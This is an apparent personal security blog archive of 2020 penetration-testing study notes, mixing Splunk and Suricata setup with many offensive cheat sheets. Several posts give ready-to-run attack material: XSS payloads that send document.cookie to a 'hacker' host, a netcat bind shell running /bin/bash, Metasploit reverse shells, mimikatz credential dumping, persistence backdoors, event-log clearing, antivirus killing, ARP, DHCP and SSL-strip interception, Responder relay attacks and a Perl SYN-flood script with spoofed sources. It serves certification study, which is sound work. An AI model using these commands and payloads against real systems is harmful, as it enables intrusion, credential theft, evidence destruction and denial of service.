Thursday, November 26, 2020

[Splunk][Suricata][Syslog] Enable Syslog on Suricata for Splunk (updated on 20201126)

 [For Suricata side:]

# cd /etc/suricata/

# cp ./suricata.yaml ./suricata_with_syslog.yaml

# vi ./suricata_with_syslog.yaml

Make sure that the following lines exist:

  - syslog:

      enabled: yes

      identity: "suricata"

      facility: local5

      level: Info

:wq

# killall -9 suricata

# suricata -c /etc/suricata/suricata_with_syslog.yaml -i wlan0 -D

# vi /etc/rsyslog.conf

Add the following line into the file (P.S.: Among others, 192.168.0.253 refers to the Splunk server, and 888 represents TCP888 port):

*.*                             @@192.168.0.253:888

:wq

# /etc/init.d/rsyslog restart



[For Splunk side:]

1) Go to "Settings"->"Data Inputs"

2) Go to "TCP"->"Add new"

3) Enter "888"->Click "Next >"

4) "Select Source Type"->"Operating System"->"syslog"-"Review >"

5) "Submit >"

6) "Start Searching"

Wednesday, November 25, 2020

[Splunk] Install and Launch Splunk at Ubuntu (updated on 20201125)

 1) Download Splunk TAR file, splunk-8.1.0.1-24fd52428b5a-Linux-x86_64.tgz, to the folder, /usr/local/sbin/.


2) Execute the following commands:

# cd /usr/local/sbin

# tar -zxvf ./splunk-8.1.0.1-24fd52428b5a-Linux-x86_64.tgz -C /opt


3) Launch Splunk by executing the command below:

# /opt/splunk/bin/splunk start


4) For the first time you launch Splunk, you need to tap the SPACE button all the way to end before type y and the ENTER button to exit the Term of Service page.


5) After that, create an administrator account by following the instruction.


6) In order to have Splunk start up, execute the following commands to create a startup script:

# vi /etc/systemd/system/splunk.service

[Unit]

Description=Splunk server

[Service]

ExecStart=/opt/splunk/bin/splunk start

KillMode=process

[Install]

WantedBy=multi-user.target

Alias=splunk.service

:wq


7) Make Splunk as a startup script and launch it:

# systemctl enable splunk.service

# systemctl start splunk.service


8) At the end, launch a web browser to access http://IP:8000/.

Wednesday, November 18, 2020

[Kali][Linux]Some useful tools in Kali Linux used as your primary OS

 To have Chinese Input Methods:

# apt-get install ibus ibus-pinyin


To have a better SSH client:

# apt-get install putty


To have a better file transfer tool (support FTP and SFTP):

# apt-get install filezilla


To have the screenshot function:

# apt-get install gnome-screenshot


To monitor the status of each network adapter:

# apt-get install iptraf


To better monitor the system resource:

# apt-get install htop


To have Chrome:

# apt-get install chromium


To download BT:

# apt-get install transmission-gtk


To read/write Office files and PDF:

# apt-get install libreoffice


Friday, November 13, 2020

[eCPPT][BeEF][XSS]BeEF-XSS Installation Playbook updated on Nov 13, 2020

 [Installation:]

# cd /usr/local/sbin

# git clone https://github.com/beefproject/beef

# cd beef

# ./install

After the installation is done, change the default password by:

# vi ./config.yaml

Modify 'passwd: "beef"' to your own password before saving the file and exiting.

# ./update-geoipdb


[Execution:]

# /usr/local/sbin/beef/beef

Then browse "http://127.0.0.1:3000/ui/panel" to manage BeEF. Bear in mind that the Hook URL is "http://YOUR_IP:3000/hook.js". The hook could be used in such a snippet as shown below:

<script src="http://YOUR_IP:3000/hook.js"></script>

Thursday, November 12, 2020

[eCPPT][sqlmap]Enhance SQLMap's Success Rate

Through utilizing the parameters "--level" and "--risk", more test cases would be launched so that the scanning success rate would go higher.


For instance, below is an ordinary scanning command:

# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --dbs


In terms of the command above, the chance of getting any useful information may not be high. However, if you try:

# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --level 3 --risk 3 --dbs


You may get what you want directly.


Again, the parameter "--level" (ranges from 1 to 5) defines the number of checks/payload to be performed, and the parameter "--risk" (ranges from 1 to 3) reflects the type of payloads being used.

Monday, November 9, 2020

[eCPPT][SNMP]Get readable information through SNMP

 Suppose you have already owned the community string, and would like to gather readable information regarding the target, please follow the example shown below:


# apt-get update && apt-get install snmpenum


# snmpenum --help

Usage: snmpenum <IP-address> <community> <configfile>


# ll /usr/share/snmpenum/

total 44

drwxr-xr-x   2 root root  4096 Nov  9 23:28 .

drwxr-xr-x 470 root root 20480 Nov  9 23:28 ..

-rw-r--r--   1 root root   554 Mar 26  2019 cisco.txt

-rw-r--r--   1 root root   347 Mar 26  2019 linux.txt

-rw-r--r--   1 root root  1103 Apr 28  2003 README.txt

-rwxr-xr-x   1 root root  3179 Mar 26  2019 snmpenum.pl

-rw-r--r--   1 root root   512 Mar 26  2019 windows.txt


# snmpenum 10.10.10.5 private windows.txt

...

----------------------------------------

USERS

----------------------------------------


Guest

admin

Administrator

...

Wednesday, October 28, 2020

Fundamental Notes for Powershell

Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/?view=powershell-5.1


<Execute Powershell script in Regular CMD:>

Example #1: Run a Powershell script in CMD:

cmd > powershell -command "& 'C:\foobar.ps1'"

Example #2: Run a Poswershell command in CMD:

cmd > powershell -command " get-process "


<Get Help Information:>

PS > Get-Help [COMMAND]

Example:

PS > Get-Help Get-Help

PS > Get-Help Get-Command


<Get Cmdlets List:>

PS > Get-Command 


<Search Cmdlets:>

PS > Get-Command -Name [PATTERN]

Example:

PS > Get-Command -Name *firewall*


<Get Process Information:>

PS > Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path,Id


<List All Alias Cmdlets:>

PS > Get-Alias -Definition [COMMAND]

Example:

PS > Get-Alias -Definition Get-ChildItem


<Inquire through WMI by using Get-WMIObject:>

Example #1: Inquire Process List

PS > Get-WmiObject -Class Win32_Process

Example #2: Inquire Service List from a remote computer

PS > Get-WmiObject -Class Win32_Service -ComputerName 10.1.4.62

Example #3: Inquire information from a query

PS > Get-WmiObject -Query "select * from win32_service where name='WinRM'" -ComputerName Server01, Server02 | Format-List -Property PSComputerName, Name, ExitCode, Name, ProcessID, StartMode, State, Status

Saturday, October 24, 2020

Information Security Journals

 Referred from https://www.cs.sjsu.edu/~stamp/securityJournals.html

Author: Mark Stamp

His email: mark.stamp@sjsu.edu

Sunday, August 23, 2020

[XSS]Two key test cases against Cross Site Scripting

 Stealing Cookie:

"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>

<script>var i = new Image();i.src="http://hacker/log.php?q="+document.cookie;</script>


Work with Browser Autopwn:

<IFRAME src='http://hacker'><\/IFRAME>


For more information, refer to my project at "https://github.com/d3m0n4l3x/alexfuzz".

Friday, August 21, 2020

[eCPPT][XSS][metasploit][Browser][Autopwn]Verify Browser Security through Metasploit

 1) Enter Metasploit msfconsole:

# msfconsole


2) Select Browser Autopwn:

msf5 > use auxiliary/server/browser_autopwn

OR

msf5 > use auxiliary/server/browser_autopwn2


3) Set up corresponding settings:

msf5 auxiliary(server/browser_autopwn) > set LHOST 192.168.0.XX /*P.S.: 192.168.0.XX is the IP address of this machine.*/

msf5 auxiliary(server/browser_autopwn) > set SRVPORT 80

msf5 auxiliary(server/browser_autopwn) > set URIPATH /


4) Start the malicious web server:

msf5 auxiliary(server/browser_autopwn) > exploit


5) Metasploit then would show you a "Local IP" URL, which should be browsed by the tested machine, as shown below:

[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.0.XX:80/ /*P.S.: http://192.168.0.XX:80/ is the URL needed to be browsed by the tested machine.*/

[*] Server started.


6) If the tested machine is vulnerable, a meterpreter should be showing up shortly.

Wednesday, August 19, 2020

[eCPPT][XSS]Test Cases for DOM-based Cross Site Scripting

 Here are some test cases for DOM-based Cross Site Scripting:

"><img src="aaa" onerror="alert(document.cookie">

"><svg/onload="alert(document.cookie">

"><svg/onload="document.forms[0].action='//192.168.0.253/get.php'">

Tuesday, August 18, 2020

[Phishing]Detect and Respond Phishing emails

 Detection:

- Utilize Threat Intelligence information to confirm if it is a phishing email.

- Phone the sender to confirm if it is a phishing email.


Response:

- Report to Federal Trade Commission at spam@uce.gov.

- Report to the finance institution being impersonated.

- Update the detection and mitigation rules on Email Security system.

Monday, August 17, 2020

[eCPPT][XSS]Mitigation of Cross Site Scription risk

 1) Specify the flags below in the cookie:

expires=

domain=

path=

secure

HttpOnly

2) Use Session ID / Token only instead of other meaningful flags.

3) Set up a Whitelist mechanism to validate user input data.

4) Leverage such encode functions as HtmlEncode to filter out some dangerous characters (e.g. "<" and ">").

TIPS: Some AntiXSS libraries could be utilized in an effort to mitigate the risk against Cross Site Scripting easily

Sunday, August 16, 2020

[Netcat][Ncat][Nmap][eCPPT]netcat cheat sheet

 Reference: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf


This cheat sheet is based on the rewritten version of NetCat, namely ncat, which is portion of Nmap.


Port Scan:

# ncat -z -w1 -n -v 192.168.0.251 22


Socket Client:

# ncat -nvv 192.168.0.251 443


Socket Server:

# ncat -vv -l -p 443


Keepalived Socket Server:

In Windows:

cmd > nc -L -p 443

In Linux/Unix:

# ncat -k -p 443


Authentication Server allowing specific clients:

Only allow 192.168.0.253 to connect the socket:

ncat --allow 192.168.0.253 -vv -l -p 443

Only deny 192.168.0.251 to connect the socket:

ncat --deny 192.168.0.251 -vv -l -p 443


Backdoor Server:

# ncat -l -p 888 -e /bin/bash


File Transferring:

Recepient / Server:

# ncat -l -p 8888 > /tmp/test.txt

Sender / Client:

# ncat -w3 -n 192.168.0.253 8888 < ./test.txt


Saturday, August 15, 2020

[Netcat]Keep Netcat sockets alive to continuously listen

 The examples below demonstrate how to create Netcat sockets continuously listening in Windows and Linux/Unix, respectively.


In Windows:

cmd > nc -vv -L -p 443


In Linux/Unix:

# ncat -vv -k -l -p 443

Friday, August 7, 2020

[ICSI_CPT]A walkthrough of Pentest agaist MS SQL Server

 First confirm if MS SQL Server is running on the default port.

# nmap -Pn -sS -p 1433 192.168.0.25


After that, try to ascentain the details of the MS SQL Server.

# nmap -v -p 1433 --script=ms-sql-info 192.168.0.25


Subsequent to having the details regardin the authentication means, Hydra could be utilized to brute force the password.

# hydra -s 1433 -l sa -P /usr/share/wordlists/sqlmap.txt


Through Metasploit, let us complete the final step of the exploitation.

# msfconsole

msf > use exploit/windows/mssql/mssql_payload

msf > set payload windows/meterpreter/reverse_tcp

msf > set LHOST XXX.XXX.XXX.XXX

msf > set RHOST XXX.XXX.XXX.XXX

msf > set USERNAME sa

msf > set PASSWORD XXXXX

msf > run

Thursday, August 6, 2020

[eCPPT]Identify Web Application Framework

1) Through HTTP Header
Such as "X-Content-Encoded-By: Joomla! 2.5"

2) Through Web Content
Such as "Copyright 2015 vBulletin Solutions."

3) Through HTTP Tags
e.g. "<meta name="generator" content="WordPress 4.2-beta3-31946" />"

4) Through URL
e.g. "index.php?option=%component_name%&task=%task_value%"

Monday, August 3, 2020

[ICSI_CPT]Mirror Website

#!/usr/bin/perl
use Cwd;
$| = 1;

sub check_wget(){
        $result = sprintf(`which wget`);
        if(length($result)==0){
                die "Please install Wget.\n";
        }
        return;
}

sub check_tree(){
        $result = sprintf(`which tree`);
        if(length($result)==0){
                die "Please install Tree.\n";
        }
        return;
}

#main() function:
&check_wget();
&check_tree();
print("URL\(e.g. \"https://192.168.0.22:5001/\" OR \"http://www.microsoft.com/\"\): ");
$url = <STDIN>;
chop($url);
if($url=~/(.*):\/\/(.*)\//){
        $protocol = $1;
        $server = $2;
}else{
        die "The format of $url is problematic!\nThe correct format should be like \"https://192.168.0.22:5001/\" OR \"http://www.microsoft.com/\".\n";
}
system("wget --protocol-directories -r $url > /dev/null 2>\&1");
$current_path = getcwd();
$path = $current_path."/".$protocol."/".$server."/";
print("$url has been downloaded at $path.\n");
$structure_file = $current_path."/".$protocol."_".$server."_structure.txt";
system("tree $path > $structure_file");
print("The STRUCTURE file has been generated at $structure_file.\n");

[ICSI_CPT][Spider]Crawl a website structure via wget

Suppose the target is http://192.168.0.253:5001/, you can mirror the website by executing the following command:
# wget --protocol-directories -r http://192.168.0.253:5001/

The command below enables you to detect the website's structure:
# tree ./http/192.168.0.253:5001/

Here is a command filtering out those webpages containing keywords, such as "password" in the following example:
# grep -nR password ./http/192.168.0.253:5001/

Saturday, August 1, 2020

[ICSI_CPT][Brute Force]Multi Brute Force attacks performed by Nmap

Suppose the target is 192.168.0.10 in this case:
# nmap -Pn -T4 -F -sT -sU --script ftp-anon,ftp-brute,telnet-brute,ssh-brute,rexec-brute,smtp-brute,smb-brute,snmp-brute 192.168.0.10

[ICSI_CPT]Testing Finger service for User Enumeration in Unix-like

Suppose the target is 192.168.0.10:
# finger @192.168.0.10
# finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10
# finger 0@192.168.0.10
# finger .@192.168.0.10
# finger **@192.168.0.10
# finger user@192.168.0.10
# finger test@192.168.0.10

Friday, July 31, 2020

[ICSI_CPT][metasploit] Privilege Escalation by disabling UAC

meterpreter > getsystem
Failed....

meterpreter > backgroup

msf > use exploit/windows/local/bypassuac

msf > set session X

msf > run

meterpreter > getsystem
Successful...

[ICSI_CPT]Check Windows Patches and Updates

Check the status of system patches and updates via CMD command:
cmd > wmic qfe get Caption,Description,HotFixID,InstalledOn

[certificate]ISO/IEC27001 Lead Auditor-2


Thursday, July 30, 2020

[eCPPT]Search sub-domains of a Top Level Domain

1) Google:
site:microsoft.com

2) Zone Transfer:
# host -l microsoft.com soa.microsoft.com

3) Shodan & Censys:
Shodan: search microsoft.com
Censys: search certificates related to microsoft.com

4) DNS Enumeration:
# dnsenum microsoft.com
# dnsrecon -d microsoft.com
# fierce -dns microsoft.com

Wednesday, July 29, 2020

[eCPPT]Detect Web services and their versions

1) whatweb
# whatweb http://www.microsoft.com/
# whatweb -v http://www.microsoft.com/

2) wappalyzer
It is an extension being able to be installed on FireFox and Chrome.

Sunday, July 26, 2020

[eCPPT][ICSI_CPT][Metasploit]Metasploit Cheat Sheet

Boot up Msfconsole:
# service postgresql start
# msfdb init
# msfconsole
msf > db_status

Search appropriate modules (some examples):
msf > search platform:Windows
msf > search platform:"Windows 7"
msf > search name:mysql
msf > search path:scada
msf > search author:jsmith
msf > search cve:2010-0249
msf > search cve:2011 author:jsmith platform:linux

Exploitation Procedure:
search -> use -> show options -> set -> show payloads -> set payload -> run

Migrate the process within Meterpreter for a stable purpose(P.S.:Suppose the PID of davcdata.exe is 2732):
meterpreter > ps
 ...
 2660  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2732  604   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.

A simple trial for privilege escalation(P.S.: for Windows victims only):
meterpreter > getsystem

Find appropriate privilege escalation exploits(P.S.:Suppose the existing session is 1):
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run

Privilege Escalation within Meterpreter(P.S.:Suppose MS10-015 vulnerability is applied and the existing session is 2):
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2

Retrieve passwords via Meterpreter:
meterpreter > load mimikatz
meterpreter > mimikatz_command -f sekurlsa::searchPassword
meterpreter > kerberos

Install a backdoor agent via Meterpreter for a persistent access:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.0.224
Among others, "-U" represents the automatic execution of the backdoor agent, "-i 5" stands for an attempt to connect the backdoor server every 5 seconds if the connection fails, "-p 443" defines TCP443 as the remote port listening on the backdoor server, and "-r 192.168.0.224" specifies the IP address of the backdoor server, which is 192.168.0.224 in this case.

Clean Windows Event Logs through Meterpreter:
meterpreter > clearev

Post-exploitation commands(for Windows):
meterpreter > sysinfo
meterpreter > getuid
meterpreter > run post/windows/manage/migrate NAME=explorer.exe
meterpreter > run post/windows/manage/killav
meterpreter > run post/windows/gather/checkvm
meterpreter > run post/windows/manage/autoroute
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/credentials/credentials_collector
meterpreter > run post/windows/gather/screen_spy
meterpreter > run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/win_privs
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/multi/recon/local_exploit_suggester

Post-exploitation commands(for Linux):
meterpreter > sysinfo
meterpreter > run post/linux/gather/enum_configs
meterpreter > run post/linux/gather/enum_system
meterpreter > run post/linux/gather/enum_users_history
meterpreter > run post/multi/recon/local_exploit_suggester

AutoRun Post-exploitation commands:
1) Save the commands above into a rc file located at /root/autorun.rc
2) Enter the handler view, specify the corresponding options, and execute the following command:
msf handler > set AutoRunScript multi_console_command -rc /root/autorun.rc
msf handler > run

Post-exploitation for further exploration:
1) ARP Scan (PS: suppose the target network is 10.32.120.0/24):
meterpreter > run arp_scanner -r 10.32.120.0/24
2) Make the compromised PC as a router/jumpbox (PS: suppose the target network is 192.168.2.0/24, and the meterpreter session id is 1):
meterpreter > background
msf > route add 192.168.2.0 255.255.255.0 1
The updated routing table can be confirmed by executing the following command:
msf > route print
The target network can be scanned through the jumpbox now by executing the commands below:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.2.1
msf > set PORTS 1-1024
msf > run

Friday, July 24, 2020

Thursday, July 23, 2020

[ICSI_CPT] Host Discovery

Passive Discovery:
# netdiscover -p

Active Discovery:
# netdiscover -r 192.168.1.0/24
# nmap -sP 192.168.1.0/24

[ICSI_CPT][DNS] DNS Discovery

# host -l microsoft.com soa.microsoft.com
# dnsenum microsoft.com
# dnsrecon -d microsoft.com

[ICSI_CPT][eCPPT][Threat Intelligence] Shodan Hacking

Reference: https://developer.shodan.io/api
Update Date: July 23, 2020

data:
OLD IIS
"iis/5.0"
microsoft.com

city:
city:London
city:Singapore

country:
country:SG
country:US

geo [An example below: Devices within a 50km radius of San Diego (32.8,-117)]:
geo:32.8,-117,50

hostname:
hostname:test

net:
net:216.219.0.0/16

ip:
ip:8.8.4.4
ip:1.1.1.1

os:
os:windows
os:"windows 2003"

port:
port:445
port:135

before/after [An example below: Apache servers sitting in China and appearing during between March 22, 2010 and June 4, 2010]:
apache country:CN after:22/03/2010 before:04/06/2010

device:
device:router
device:webcam

Sunday, July 19, 2020

OS Configuration Security Review | Local Vulnerability Scan

[Windows:]

Policy Analyzer (Microsoft Security Compliance Toolkit)
https://www.microsoft.com/en-us/download/details.aspx?id=55319

Microsoft Baseline Security Analyzer (MBSA)
https://www.microsoft.com/en-us/download/details.aspx?id=19892


[Linux:]

OpenSCAP
https://www.open-scap.org/

Lynis
https://cisofy.com/lynis/

Saturday, July 18, 2020

[eCPPT][SSL][MITM] SSL Strip Attack

Comment: The following experimentation works well with Kali 2018.1. The reason why I don't use the newest version, namely 2020.X, is because the newest version has no sslstrip by default, and is tough to install python-twisted-web, which is required by sslstrip.

Running (In this case, 192.168.0.19 is the victim, 192.168.0.1 is the gateway, and TCP8080 is the listening port) :
# sysctl net.ipv4.ip_forward=1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# sslstrip -a -f -l 8080 -w /root/sslstrip.log
Open a new terminal and type:
# arpspoof -i eth0 -t 192.168.0.19 -r 192.168.0.1

Harvest:
Open a new terminal and type:
# tail -n 30 -f /root/sslstrip.log

P.S.: This experimentation only succeeds when the victim's browser does not support HSTS.

Friday, July 17, 2020

[eCPPT][MITM]Bettercap to lauch ARP POISONING

Installation:
# apt-get update
# apt-get install bettercap

Execution:
# sysctl net.ipv4.ip_forward=1
# bettercap -iface wlan0

Tweaking:
The help command would show the status of modules:
>> help
Leverage "MODULE_NAME on/off" to turn on or shut down specific module:
>> arp.spoof on
>> net.sniff off

ARP Poisoning:
>> net.recon on
>> net.sniff on
>> arp.spoof on

Thursday, July 16, 2020

[eCPPT][MITM][Spoofing][Poisoning]LAN-Based Man In The Middle Attacks

1) MAC Flooding

Currently, most switches each can store 100,000,000 MAC addresses. As such, the following command can stuff the CAM table:
# sysctl net.ipv4.conf.all.forwarding=1
# macof -i eth0 -n 100000000
This attack is obsolete given that modern switches each can store a great quantity of MAC addresses.

Countermeasure:
- Port Security to limit the number of PCs connecting to each port
- IEEE 802.1x requiring connected PCs to forcibly authenticate their identities
- MAC Filtering only allowing authorized MAC addresses to communicate


2) ARP Poinsoning

In the scenario below, 192.168.0.1 is the gateway's IP address, and 192.168.0.7 is the victim's IP Address.
# sysctl net.ipv4.conf.all.forwarding=1
# arpspoof -i eth0 -t 192.168.0.7 -r 192.168.0.1
Then leverage WireShark to capture the confidential information.

More details can refer to the following two documents:
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on.html
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on_5.html

Countermeasure:
- Encryption In Transit and At Rest to withstand Man In The Middle and Interception
- Applying Static ARP to networks
- Leverage such integration solutions as CISCO DHCP Snooping and Dynamic ARP Inspection


3) DHCP Spoofing

Install Yersinia first:
# apt-get update
# apt-get install yersinia
Now start hacking:
# ifconfig eth0:1 192.168.1.1 netmask 255.255.255.0
# ifconfig eth0:1 up
# sysctl net.ipv4.ip_forward=1
Leverage the following steps to launch DHCP Starvation attack in order to exhaust the authorized DHCP server:
# yersinia -I
"i" -> Change to the network adapter "eth0" -> "q"
"F2" to change to DHCP mode
"x" -> "1"
And then start launching a rogue DHCP server:
"x" -> "2"
Fill out the following information before pressing the ENTER button to launch DHCP Spoofing attack:
Server ID: 192.168.001.001
Start IP: 192.168.001.100
End IP: 192.168.001.200
Lease Time (secs): 99999999
Renew Time (secs): 99999999
Subnet Mask: 255.255.255.000
Router: 192.168.001.001
DNS Server: 008.008.004.004
Domain: test.com
The next step is to allow the network created by the rogue DHCP server to access the legitimate networks by establishing a NAT rule, as shown below.
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
At the end, don't forget turning off the firewall if any.

Countermeasure:
- Give up DHCP and use static IP addresses instead
- Deploy NIDS-alike systems to monitor DHCP Starvation attack


4) LLMNR/NBT-NS Spoofing/Poisoning (Responder && MultiRelay)

Scenario #1:
When someone in the same WINDOWS domain makes a typo with an nonexistent hostname, the following command will capture the request, and respond with a fake response in order to gain the one's username and the hash of the one's password.
[Attacker Kali PC:]
# responder -I eth0
After gaining the username and hash:
# cd /usr/share/responder/logs
Apply john the ripper to the case as shown below:
# john ./SMB-NTLMv1-SSP-192.168.0.11.txt

Scenario #2:
If those PCs sitting in the WINDOWS network enable WPAD configuring proxy settings, the WPAD listener could be enabled to trick PCs' owners into typing their passwords, the attacker then can get the passwords without decrypting anything.
[Attacker Kali PC:]
# responder -I eth0 -wrFb

Scenario #3:
The Multi-Relay function of Responder could be applied when SMB Signing settings on the victim's PC is disabled.
[Attacker Kali PC:]
First determine if SMB Signing settings on the victim is disabled:
# /usr/share/responder/tools/RunFinger.py -i 192.168.0.11
After confirming that SMB Signing is disabled on the victim's PC, edit responder.conf and turn off SMB and HTTP services:
# vi /etc/responder/Responder.conf
SMB = Off
HTTP = Off
:wq
# responder -I eth0 --lm
The following command can help get a shell directly:
# /usr/share/responder/tools/MultiRelay.py -t 192.168.0.11 –u ALL

Countermeasure:
- Enable SMB Signing

Friday, July 10, 2020

[eCPPT][snmp]SNMP Hacking

[Server:]
For the server side, install a SNMPd through Docker:
# /etc/init.d/docker start
# docker run -d --name snmpd -p 161:161/udp polinux/snmpd


[Hacker:]
Confirm if the remote SNMP is working properly:
# nmap -sU -sV -n -p 161 192.168.0.253

Check what NMAP scripts could be used to get further information:
# ll /usr/share/nmap/scripts/|grep snmp
-rw-r--r-- 1 root root  7501 Mar 10 12:52 snmp-brute.nse
-rw-r--r-- 1 root root  4375 Mar 10 12:52 snmp-hh3c-logins.nse
-rw-r--r-- 1 root root  5216 Mar 10 12:52 snmp-info.nse
-rw-r--r-- 1 root root 28629 Mar 10 12:52 snmp-interfaces.nse
-rw-r--r-- 1 root root  5965 Mar 10 12:52 snmp-ios-config.nse
-rw-r--r-- 1 root root  4143 Mar 10 12:52 snmp-netstat.nse
-rw-r--r-- 1 root root  4418 Mar 10 12:52 snmp-processes.nse
-rw-r--r-- 1 root root  1854 Mar 10 12:52 snmp-sysdescr.nse
-rw-r--r-- 1 root root  2557 Mar 10 12:52 snmp-win32-services.nse
-rw-r--r-- 1 root root  2726 Mar 10 12:52 snmp-win32-shares.nse
-rw-r--r-- 1 root root  4700 Mar 10 12:52 snmp-win32-software.nse
-rw-r--r-- 1 root root  2003 Mar 10 12:52 snmp-win32-users.nse

Brute Force the community strings:
# nmap -sU -p 161 --script=snmp-brute.nse --script-args=snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.0.253
# hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.0.253

Take a chance to try the community string, "public", by using SNMP Walking:
# snmpwalk -v 2c 192.168.0.253 -c public

More clearly understand the target's settings via SNMP:
# snmp-check 192.168.0.253 -c public

Check an OID and modify it:
# snmpwalk -v 2c 192.168.0.253 -c public .iso.3.6.1.2.1.1.9.1.3.1
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
# snmpset -v 2c -c private 192.168.0.253 .iso.3.6.1.2.1.1.9.1.3.1 s "Test"

Wednesday, July 8, 2020

[eCPPT]SMB and RPC enumeration and mounting

Enumeration:
#enum4linux 192.168.0.191
#nbtstat -v 192.168.0.191
#rpcclient -N -U "" 192.168.0.191

Mount share drives:
#mount.cifs //192.168.0.191/C /media/C_share/ user=,pass=
#smbclient \\\\192.168.0.191\\C "welcome20XX" -U "TempUser"

Audit Linux command line

1) The script and scriptplay commands
tecmint@tecmint ~ $ script --timing=time.txt script.log
Script started, file is script.txt
tecmint@tecmint ~ $ exit
Script done, file is script.txt
tecmint@tecmint ~ $ scriptreplay --timing=time.txt script.log


2) The trap command:
$ trap 'echo "$USER":"$BASH_COMMAND" >>/path/to/log' DEBUG
$ uname
Linux
$ pwd
/home/dessert
$ hostname
dessert’s plowhorse
$ ls
dir1 file1 file2
$
$
$ bahs
No command 'bahs' found, did you mean:
 Command 'bash' from package 'bash' (main)
 Command 'bats' from package 'bats' (universe)
bahs: command not found
$ cat /path/to/log
dessert:uname
dessert:pwd
dessert:hostname
dessert:ls --color=auto
dessert:bahs
dessert:cat /path/to/log

Monday, July 6, 2020

[eCPPT][nmap]Scanning techniques for Firwall/IDS Evasion

1) Fragmentation
Utilize the parameters "-sS -f", such as:
#nmap -sS -f 192.168.0.1
This technique is obsoleted given that nearly all modern NIDSs can detect this kind of scanning.

2) Decoy
Use the parameters, "-sS -D", to make a couple of bogus IP addresses as fake scanners to confuse security anaylsts.
#nmap -sS -D 192.168.0.3,192.168.0.5,192.168.0.7,ME,192.168.0.11 192.168.0.251

3) Prolong the interval among scan requests
Apply "-T0" (5 minutes) or "-T1" (15 seconds) to the scan in order to hide the scanning activities.
#nmap -sS -p 25,80,443 -T0 192.168.0.1

4) Set Scanning Source Port as Famous Service Port
Change the source port of those scanning probes to a famous service port (e.g. 25, 80, or 443) by using a parameter, "-g".
#nmap -sS -g 25 192.168.0.1
#nmap -sU -g 53 192.168.0.251

5) Idle Scan
Utilize a zombie to scan a targeting host through leveraging a parameter, "-sI".
First, determine if a host (i.e. 192.168.0.251) can be a zombie:
#nmap -O -v -n 192.168.0.251
Second, if the zombie host is confirmed to be available, use it to scan the targeting host (i.e. 192.168.0.253):
#nmap -p22 -sI 192.168.0.251:443 192.168.0.253

Saturday, July 4, 2020

[nmap]syn_flood_through_nmap.pl

#!/usr/bin/perl -w
$|=1;

sub randomip(){
@digits = ();
for (0..3) {
push @digits, int (rand (255) + 1);
}
return join '.', @digits;
}
#print randomip(); #DEBUG

sub check_nmap(){
$result = sprintf(`which nmap`);
if(length($result)==0){
die "Please install Nmap.\n";
}
return;
}


&check_nmap();
print("Target IP address (e.g. 192.168.0.1): ");
$target_ip=<STDIN>;
chop($target_ip);
print("Target TCP port (e.g. 25): ");
$target_port=<STDIN>;
chop($target_port);
print("Network Interface sending out SYN (e.g. eth0): ");
$network_adapter=<STDIN>;
chop($network_adapter);


print("Launching SYN Flood...");

while(1){
$src_ip = &randomip();
system("nmap -e $network_adapter -Pn -sS -T5 -p $target_port -S $src_ip $target_ip");
}

exit(1);

Friday, July 3, 2020

Thursday, July 2, 2020

[eCPPT][nmap]Confirm if a remote machine can be used as a zombie

#nmap -O -v -n 192.168.0.1
OR (when you have already known which remote TCP port is open, such as TCP135 in the following example):
#nmap -O -v -n 135 10.50.97.10

Below shows that the aforementioned machine can be a zombie for Nmap's Idle Scan:
IP ID Sequence Generation: Incremental

Monday, June 29, 2020

[eCPPT][DNS]DNS Reconnaissance

DNS Dumpster (https://dnsdumpster.com/)
DNS Enumerate (#dnsenum --subfile /root/report.txt -v -f /usr/share/dnsenum/dns.txt -u a -r microsoft.com)

Saturday, June 27, 2020

[eCPPT]DNS Reverse Lookup Tool

https://hackertarget.com/reverse-dns-lookup/

https://dnslytics.com/reverse-ip

https://reverseip.domaintools.com/

https://www.robtex.com/

[eCPPT][DNS]The dig command in Linux

General Lookup:
#dig TARGET +short
Example:
#dig microsoft.com +short

PTR Lookup:
#dig TARGET PTR
Example:
#dig microsoft PTR

MX Lookup:
#dig TARGET MX
Example:
#dig microsoft.com MX

NS Lookup:
#dig TARGET NS
Example:
#dig microsoft.com NS

Zone Transfer:
#dig @SERVER TARGET -t AXFR +nocookie
Example:
#dig @10.50.96.5 foocampus.com -t AXFR +nocookie

Wednesday, June 24, 2020

[eCPPT][Pentest][Threat Intelligence]Search Engines for reconnaissance

Gov-related:
SAM Database (www.sam.gov)

Job Posting:
LinkedIn (www.linkedin.com)
Indeed (www.indeed.com)
